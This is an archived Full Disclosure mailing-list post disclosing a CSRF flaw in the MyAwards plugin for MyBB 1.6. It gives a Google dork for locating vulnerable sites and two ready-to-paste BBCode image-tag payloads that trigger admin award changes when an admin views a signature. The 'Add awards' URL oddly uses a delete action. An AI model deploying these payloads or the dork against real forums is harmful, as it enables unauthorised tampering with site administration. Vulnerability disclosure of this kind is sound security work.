[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] MyBB 1.6 - MyAwards CSRF

To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
Subject: [FD] MyBB 1.6 - MyAwards CSRF
From: surivaton surivaton <surivaton@xxxxxxxxx>
Date: Fri, 22 Aug 2014 18:52:01 +1000

# Google Dork: allinurl:myawards.php
# Date: 08/17/2014
# Exploit Author: Vagineer https://vagineering.me
# Version: ALL VERSIONS
# Tested on: MyBB 1.6.15

PoC(set this as your signature or iframe it)
Add awards
[img]
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
[/img]
Remove awards
[img]
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1
 [/img]

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: Re: [FD] Hilariously Bad SQRL Implementation
Next by Date: [FD] RCE in dragonfly gem
Previous by thread: [FD] ntopng 1.2.0 XSS injection using monitored network traffic
Next by thread: [FD] RCE in dragonfly gem
Index(es):
- Date
- Thread